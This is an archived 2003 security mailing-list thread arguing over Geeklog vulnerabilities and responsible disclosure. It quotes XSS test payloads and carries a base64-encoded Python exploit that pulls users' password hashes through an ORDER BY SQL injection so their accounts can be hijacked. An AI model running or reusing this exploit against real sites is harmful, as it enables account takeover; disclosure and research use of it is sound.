[32023] in bugtraq
Re: [Full-Disclosure] Re: I have fixes for the Geeklog
daemon@ATHENA.MIT.EDU (Chris.Kulish@us.ing.com)
Wed Oct 8 14:38:56 2003
To: jkuperus@planet.nl
Cc: full-disclosure@lists.netsys.com, bugtraq@securityfocus.com,
dirk@haun-online.de
Message-ID: <OFFD30122A.789CCA02-ON86256DB9.005B86BA-86256DB9.005D909F@equitable-of-iowa.com>
From: Chris.Kulish@us.ing.com
Date: Wed, 8 Oct 2003 11:53:57 -0500
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="0__=09BBE72ADFC8002A8f9e8a93df938690918c09BBE72ADFC8002A"
Content-Disposition: inline
--0__=09BBE72ADFC8002A8f9e8a93df938690918c09BBE72ADFC8002A
Content-Type: text/plain;
charset=us-ascii
Content-Transfer-Encoding: 7bit
Let me start off by saying that I am NOT a geeklog developer. I would also
like to mention, like any project, alot of this code was inherited by the
developers and they have been working hard to squash security bugs when
notified properly. Give the developers a chance to keep their users
secure.
Comments in line:
-----
Chris Kulish
Systems Engineer
ING Advisors Network
chris.kulish@us.ing.com
Ph. 515.698.7583
Fx. 515.698.3583
"There's more to living than only surviving"
"Maybe I'm not there, but I'm still trying"
-- The Offspring
-----
jelmer
<jkuperus@planet. To: "Dirk Haun" <dirk@haun-online.de>, full-disclosure@lists.netsys.com,
nl> bugtraq@securityfocus.com
cc: (bcc: Chris Kulish/BDN/ING-FSI-NA)
10/07/2003 07:23 Subject: Re: [Full-Disclosure] Re: I have fixes for the Geeklog vulnerabilities
PM
Dirk,
Ok let me get this straight, basicly what your saying is,
He's correct on one point the xss issue, and the others might possibly
affect mysql 4.1" (it does)
and then you go about and tell him how he wasted everybodys time
So if it affects only 1% of your userbase its not an issue and you
shouldn't
be reporting it ?
even on mysql 3 its probably posible to constuct some url that will suck up
a lot of resources
on your site you claim Three members of the Geeklog development team have
now been trying to reproduce
these issues and failed, wouldn't your time have been better spend *fixing*
these issues,
it's hardly rocket science. why wait until someone comes up with a clever
way to exploit it. It's obviously
a risk why wait until it becomes a threat
---
First, if you cant reproduce a problem, how can you expect to fix it? It's
not rocket science, you are correct. Even so, why not approach it
properly?
---
IMHO you've got the wrong attitude. Anyway I am not done yet
I don't normally "do" sql injection but beeing anoyed with your response as
I was i took a quick
look at this geeklog, and I was stunned at how insecure it was
---
I've been annoyed at the disclosure as well. People need to contact the
developers *FIRST*, before running at the mouth, for a number of reasons.
To confirm the installation environment of the elleged security breach. To
let the authors attempt to reproduce it accordingly. To not compromise the
userbase that can't do anything about it until the programmers are done.
Shall I go on? Yes, geeklog has security issues, name one piece of
software that doesnt.
---
- It by default stores the password hash in a cookie, you cant turn that
off
- you dont have to enter your old password in order to change it
this means that any xss issue in this site will lead to compromises of
accounts, you can steal the
hash and userID place it in your cookie, log in and voila, if you do this
you have to be *EXTREMELY*
wary of xss issues, well your not, you can find these all over the place
---
And 90% of geeklog sites are non-ssl, so what's your point? The username
and password pairs are already transmitted in cleartext. Remember what
geeklog is geared towards, blogging. This isn't a HIPPA qualified
application, nor was it meant to be.
---
all the classics just work like
<img src="javascript:alert()">
<b style="background-image: url(javascript:alert(document))">test</b>
in the forum, I wont even bother listing all the issues
parameters passed in urls that get inserted into queries get sanitized
hardly anywhere ,
I attached a python script that should crack any users account who ever
posted to the forum's in under half an hour,
just get the hash stuff it and the acomanying user id in a cookie, get to
the site and change the password
The exploit is rather messy and I haven't tested it too thorougly but it
should work (i think :) ) note this is a seperate issue as the ones
reported by Lorenzo. but again these issues all over the place
---
And did you contact the developers about this before emailing the security
lists? Let's *ALL* be responsible about discloser. It's not just the
developers that have to be repsonsible about security
---
--jelmer
----- Original Message -----
From: "Dirk Haun" <dirk@haun-online.de>
To: <full-disclosure@lists.netsys.com>
Sent: Sunday, October 05, 2003 11:03 PM
Subject: [Full-Disclosure] Re: I have fixes for the Geeklog vulnerabilities
> Lorenzo Hernandez Garcia-Hierro wrote:
>
> >Due to the completely incorrect treatment and work of the Geeklog
> >development team , that they don't developed fixes for THEIR product
>
> As a member of the Geeklog Development Team, I'd like to point out that
> the poster of the above lines did not bother to contact us, both with his
> original findings, nor with these patches. Talk about incorrect
treatment.
>
> Furthermore, of the original findings (posted here and on BugTraq a week
> ago), only the Shoutbox issue has been confirmed (and a patch is
> available on the Geeklog website).
>
> None of the supposed SQL injection issues that Lorenzo Hernandez Garcia-
> Hierro claims to have found could be confirmed by us or members of the
> Geeklog community. We can only assume that he only noticed that when
> attempting to inject SQL into URLs, Geeklog would produce SQL errors and
> from that he seems to have deduced that Geeklog was vulnerable for SQL
> injections. When asked to explain his findings, he couldn't (or wouldn't)
> come up with a working example either.
>
> Now, there's no doubt that Geeklog could do a better job in filtering
> these attempts. Work on that is currently under way - which we would have
> told Lorenzo Hernandez Garcia-Hierro if he had bothered to contact us.
>
> Potential problems that we have found so far:
>
> - the SQL error message displayed by Geeklog could, in theory, leak
> sensitive information
> - sites where the PHP magic_quotes setting is OFF are slightly more prone
> to the (alleged) injections then when it's ON
> - sites running on MySQL 4.1 (which is currently in alpha state and not
> ready for production use) are at a higher risk since MySQL 4.1 allows
> concatenation of SQL requests (which previous versions didn't)
>
> We have informed our users about these issues on the Geeklog homepage and
> will continue to do so. We value security very highly, but we prefer to
> handle it in a non-sensationalist way. We would have prefered to come up
> with a solution to the problems and then post a detailed analysis of the
> problems here (and on BugTraq). With his failure to contact the
> developers, Lorenzo Hernandez Garcia-Hierro has yet again caused more
> confusion than actually helping the situation.
>
> Overall, this is a textbook example of how NOT to handle security issues.
> By not contacting the developers, posting a report full of inaccuracies,
> and, in the end, mostly non-working examples, Lorenzo Hernandez Garcia-
> Hierro has caused uncertainty and confusion amongst the Geeklog users and
> basically wasted everyone's time, including that of the developers.
>
> Dirk Haun,
> Maintainer of the Geeklog 1.3.x branch,
> Geeklog Development Team
>
>
> --
> http://www.geeklog.net/
> http://geeklog.info/
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
(See attached file: geeklog.py)
--0__=09BBE72ADFC8002A8f9e8a93df938690918c09BBE72ADFC8002A
Content-Type: application/octet-stream;
name=geeklog.py
Content-Disposition: attachment;
filename=geeklog.py
Content-Transfer-Encoding: base64
IyEvdXNyL2Jpbi9weXRob24NCg0KIiIiDQoNCk1lc3N5IGdlZWtsb2cgZXhwbG9pdCBieSBqZWxt
ZXINCg0KDQp1c2FnZSA6DQogICAgDQoNCjAuIElmIHlvdSBoYXZlbid0IGdvdCBweXRob24gaW5z
dGFsbGVkIGRvd25sb2FkIGl0IGF0IGh0dHA6Ly93d3cucHl0aG9uLm9yZy8NCg0KMS4gcmVnaXN0
ZXIgYW4gYWNjb3VudCBhdCB0aGUgZ2Vla2xvZyBzZXJ2ZXIgeW91IHdhbnQgdG8gY3JhY2sNCg0K
Mi4gY2hhbmdlIA0KDQogICBPVVJfVVNFUl9JRA0KICAgT1VSX1VTRVJOQU1FDQogICBPVVJfUEFT
U1dPUkQNCiAgIE9VUl9FTUFJTA0KICAgDQogICBpbiB0aGUgc291cmNlIGNvZGUgYmVsb3cgdG8g
dGhlIHZhbHVlcyBhc2lnbmVkIHRvIHRoZSBhY2NvdW50IHlvdSBnZW5lcmF0ZWQNCiAgIA0KICAg
Y2hhbmdlIEdFRUtMT0dfTE9DQVRJT04gdG8gdGhlIGxvY2F0aW9uIG9mIHRoZSBnZWVrbG9nIHlv
dSB3YW50IHRvIGNyYWNrIGZvciBpbnN0YW5jZQ0KICAgaHR0cDovL3d3dy5nZWVrbG9nLm5ldA0K
ICAgDQogICANCjMuIExvb2t1cCB0aGUgdXNlcklEIG9mIHRoZSB1c2VyIHlvdSB3YW50IHRvIGNy
YWNrIGFuZCBmaWxsIGl0IGluIGFzIHRoZSBUQVJHRVRfVVNFUl9JRCBiZWxvdw0KDQo0LiBydW4g
dGhpcyBzY3JpcHQgZnJvbSB0aGUgY29tbWFuZGxpbmUgYnkgdHlwaW5nIHB5dGhvbiBnZWVrbG9n
LnB5LCANCiAgICpuaXggdXNlcnMgY2FuIGFsc28gY2htb2QgK3ggLi9nZWVrbG9nLnB5DQogICBO
b3cgd2FpdCAocXVpdGUgYSBsb25nIHRpbWUpIGFzIGl0IG5lZWRzIHRvIGNyYWNrIDMyIHBvc2l0
aW9ucw0KICAgDQoNCg0Kbm90ZXMgOg0KDQoNCnRoZW9yZXRpY2x5IGl0IGNhbiBwcm9kdWNlIGZh
bHNlIHJlc3VsdHMgd2hlbiBhIHVzZXIgcmVnaXN0ZXJzIHdoaWxlIGNyYWNraW5nIGlzIGluIHBy
b2dyZXNzDQoNCiIiIg0KDQoNCmltcG9ydCBtZDUsIHVybGxpYiwgdXJsbGliMiwgcmUNCg0KDQpP
VVJfVVNFUl9JRCA9IDcwMDANCk9VUl9VU0VSTkFNRSA9ICJ5b3VydXNlcm5hbWUiDQpPVVJfUEFT
U1dPUkQgPSAieW91cnBhc3N3b3JkIg0KT1VSX0VNQUlMID0gInlvdXJAZW1haWwuY29tIg0KDQpU
QVJHRVRfVVNFUl9JRCA9IDcwMDENCg0KR0VFS0xPR19MT0NBVElPTiA9ICJodHRwOi8vd3d3Lmdl
ZWtsb2cubmV0Ig0KDQoNCkhBU0hDSEFSUyA9ICIwMTIzNDU2Nzg5YWJjZGVmIg0KR0VOX1BBU1NX
T1JEX0NIQVJTID0gImFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6Ig0KDQoNCmRlZiBnZXRTZXNz
aW9uSUQodXNlcm5hbWUsIHBhc3N3b3JkKToNCiAgICANCiAgICBteXJlcSA9IHVybGxpYjIuUmVx
dWVzdChHRUVLTE9HX0xPQ0FUSU9OICsgIi91c2Vycy5waHAiKQ0KICAgIA0KICAgIGRhdGEgPSB7
ImxvZ2lubmFtZSIgOiB1c2VybmFtZSwNCiAgICAgICAgICAgICJwYXNzd2QiICAgIDogcGFzc3dv
cmQNCiAgICAgICAgICAgfQ0KICAgICAgICAgICAgDQogICAgbXlyZXEuYWRkX2RhdGEodXJsbGli
LnVybGVuY29kZShkYXRhKSkNCiAgICBwYWdlID0gdXJsbGliMi51cmxvcGVuKG15cmVxKQ0KICAg
IGNvb2tpZXMgPSBwYWdlLmluZm8oKVsiU2V0LUNvb2tpZSJdDQogICAgbWF0Y2ggPSByZS5zZWFy
Y2gociJnbF9zZXNzaW9uPShbMC05XXsxLDE1fSkiLCBjb29raWVzKQ0KICAgIHJldHVybiBtYXRj
aC5ncm91cCgxKSAgICANCg0KDQpkZWYgY2hhbmdlUGFzc3dvcmQoc2Vzc2lvbklELCBuZXdQYXNz
d29yZCk6DQogICAgDQogICAgZGF0YSA9IHsicGFzc3dkIiAgICAgIDogbmV3UGFzc3dvcmQsDQog
ICAgICAgICAgICAiY29va3RpbWUiICAgIDogIjYwNDgwMCIsDQogICAgICAgICAgICAiZW1haWwi
ICAgICAgIDogT1VSX0VNQUlMLA0KICAgICAgICAgICAgInVpZCIgICAgICAgICA6IHN0cihPVVJf
VVNFUl9JRCksDQogICAgICAgICAgICAibW9kZSIgICAgICAgIDogInNhdmV1c2VyIiwNCiAgICAg
ICAgICAgICJ1c2VybmFtZSIgICAgOiBPVVJfVVNFUk5BTUUNCiAgICAgICAgICAgfQ0KDQogICAg
Y29va2llID0gImdsX3Nlc3Npb249IiArIHNlc3Npb25JRCANCiAgICANCiAgICBteXJlcSA9IHVy
bGxpYjIuUmVxdWVzdChHRUVLTE9HX0xPQ0FUSU9OICsgIi91c2Vyc2V0dGluZ3MucGhwIikNCiAg
ICBteXJlcS5hZGRfZGF0YSh1cmxsaWIudXJsZW5jb2RlKGRhdGEpKQ0KICAgIG15cmVxLmFkZF9o
ZWFkZXIoIkNvb2tpZSIsY29va2llKQ0KICAgIHVybGxpYjIudXJsb3BlbihteXJlcSkgICAgDQog
ICAgDQogICAgcHJpbnQgImNoYW5nZWQgcGFzc3dvcmQgdG8gIiArIG5ld1Bhc3N3b3JkDQoNCg0K
ZGVmIGhleHN0cihpbmNoYXJzKToNCiAgICByZXN1bHQgPSAnJw0KICAgIGZvciBjaGFyIGluIGlu
Y2hhcnM6DQogICAgICAgIHJlc3VsdCArPSAoJzAnICsgaGV4KG9yZChjaGFyKSlbMjpdKVstMjpd
DQogICAgcmV0dXJuIHJlc3VsdA0KDQoNCmRlZiBmaW5kKGlucHV0LCBsZXZlbCwgbWF4LCBjaGFy
YWN0ZXIsIHBvc2l0aW9uKToNCiAgICANCiAgICBmb3VuZCA9IEZhbHNlDQogICAgcmVzdWx0ID0g
IiINCiAgICANCiAgICBmb3IgY2hhciBpbiBHRU5fUEFTU1dPUkRfQ0hBUlM6DQogICAgDQogICAg
ICAgIGlmIG5vdCBmb3VuZDoNCiAgICAgICAgICAgIHN0YXJ0ID0gaW5wdXQgKyBjaGFyDQogICAg
ICAgICAgICANCiAgICAgICAgICAgIGlmIGxldmVsIDwgbWF4Og0KICAgICAgICAgICAgICAgIGZv
dW5kLCByZXN1bHQgPSBmaW5kKHN0YXJ0LCBsZXZlbCArIDEgLCBtYXgsIGNoYXJhY3RlciwgcG9z
aXRpb24pDQogICAgICAgICAgICBlbHNlOg0KICAgICAgICAgICAgICAgIGlmIGhleHN0cihtZDUu
bmV3KHN0YXJ0KS5kaWdlc3QoKSlbcG9zaXRpb25dID09IGNoYXJhY3RlcjoNCiAgICAgICAgICAg
ICAgICAgICAgcmV0dXJuIFRydWUsIHN0YXJ0DQogICAgDQogICAgcmV0dXJuIGZvdW5kLCByZXN1
bHQNCg0KDQpkZWYgZ2VuZXJhdGVQYXNzd29yZFdpdGhIYXNoQ2hhckF0UG9zaXRpb24oY2hhcmFj
dGVyLCBwb3NpdGlvbik6DQogICAgDQogICAgbnJPZkNoYXJzID0gMA0KICAgIHdoaWxlIFRydWU6
DQogICAgICAgIChmb3VuZCwgdmFsdWUpID0gZmluZCAoIiIsIDAsIG5yT2ZDaGFycywgY2hhcmFj
dGVyLCBwb3NpdGlvbikNCiAgICAgICAgDQogICAgICAgIGlmIGZvdW5kOg0KICAgICAgICAgICAg
cmV0dXJuIHZhbHVlDQogICAgICAgIGVsc2U6DQogICAgICAgICAgICBuck9mQ2hhcnMgKz0xDQoN
Cg0KDQpzZXNzaW9uSUQgPSBnZXRTZXNzaW9uSUQoT1VSX1VTRVJOQU1FLCBPVVJfUEFTU1dPUkQp
DQoNCnByaW50ICJnb3Qgc2Vzc2lvbiBJRCA6ICIgICsgc2Vzc2lvbklEDQoNCnJlc3VsdCA9ICIi
DQpmb3IgaSBpbiByYW5nZSgzMik6DQogICAgDQogICAgcHJpbnQgImNyYWNrZWQgJXMgb2YgMzIg
aGFzaCBjaGFyYWN0ZXJzIDogJXMiICUgKCBpLCByZXN1bHQpDQogICAgDQogICAgcGFnZSA9IDEN
CiAgICBmb3VuZCA9IEZhbHNlDQogICAgZm9yIGogaW4gcmFuZ2UobGVuKEhBU0hDSEFSUykpOg0K
ICAgICAgICANCiAgICAgICAgY2hhbmdlUGFzc3dvcmQoc2Vzc2lvbklELCBnZW5lcmF0ZVBhc3N3
b3JkV2l0aEhhc2hDaGFyQXRQb3NpdGlvbihIQVNIQ0hBUlNbal0sIGkpKQ0KDQogICAgICAgIHdo
aWxlIFRydWU6DQogICAgICAgIA0KICAgICAgICAgICAgd2VicGFnZSA9IHVybGxpYjIudXJsb3Bl
bihHRUVLTE9HX0xPQ0FUSU9OICsgIi9mb3J1bS9tZW1iZXJsaXN0LnBocD9vcmRlcj1taWQocGFz
c3dkLCIgKyBzdHIoaSArIDEpICsgIiwxKSx1aWQmcHJldm9yZGVyPXVpZCZkaXJlY3Rpb249QVND
JnBhZ2U9IiArIHN0cihwYWdlKSkucmVhZCgpDQogICAgICAgICAgICANCiAgICAgICAgICAgIHVz
ID0gd2VicGFnZS5maW5kKCJ1c2Vycy5waHA/bW9kZT1wcm9maWxlJnVpZD0iICsgc3RyKE9VUl9V
U0VSX0lEKSArICciJykNCiAgICAgICAgICAgIHRhcmdldCA9IHdlYnBhZ2UuZmluZCgidXNlcnMu
cGhwP21vZGU9cHJvZmlsZSZ1aWQ9IiArIHN0cihUQVJHRVRfVVNFUl9JRCkgKyAnIicpDQoNCg0K
ICAgICAgICAgICAgaWYgdXMgIT0gLTEgYW5kIHRhcmdldCAhPSAtMToNCiAgICAgICAgICAgICAg
ICBmb3VuZCA9IHVzID4gdGFyZ2V0DQogICAgICAgICAgICAgICAgYnJlYWsNCiAgICAgICAgICAg
ICAgICANCiAgICAgICAgICAgIGVsaWYgdXMgIT0gLTE6DQogICAgICAgICAgICAgICAgYnJlYWsN
CiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIGVsaWYgdGFyZ2V0ICE9IC0xOg0KICAgICAg
ICAgICAgICAgIGZvdW5kID0gVHJ1ZQ0KICAgICAgICAgICAgICAgIGJyZWFrDQogICAgICAgICAg
ICAgICAgDQogICAgICAgICAgICBlbHNlOg0KICAgICAgICAgICAgICAgIHBhZ2UgKz0gMQ0KICAg
ICAgICAgICAgICAgIHByaW50ICJwcm9iZWVyIHBhZ2luYSAiICsgc3RyKHBhZ2UpDQogICAgICAg
ICAgICAgICAgDQogICAgICAgIGlmIGZvdW5kOg0KICAgICAgICAgICAgcmVzdWx0ICs9IEhBU0hD
SEFSU1tqXQ0KICAgICAgICAgICAgYnJlYWsNCiAgICANCg0KcHJpbnQgImhhc2ggY29tcGxldGUg
OiAiICsgcmVzdWx0DQo=
--0__=09BBE72ADFC8002A8f9e8a93df938690918c09BBE72ADFC8002A--
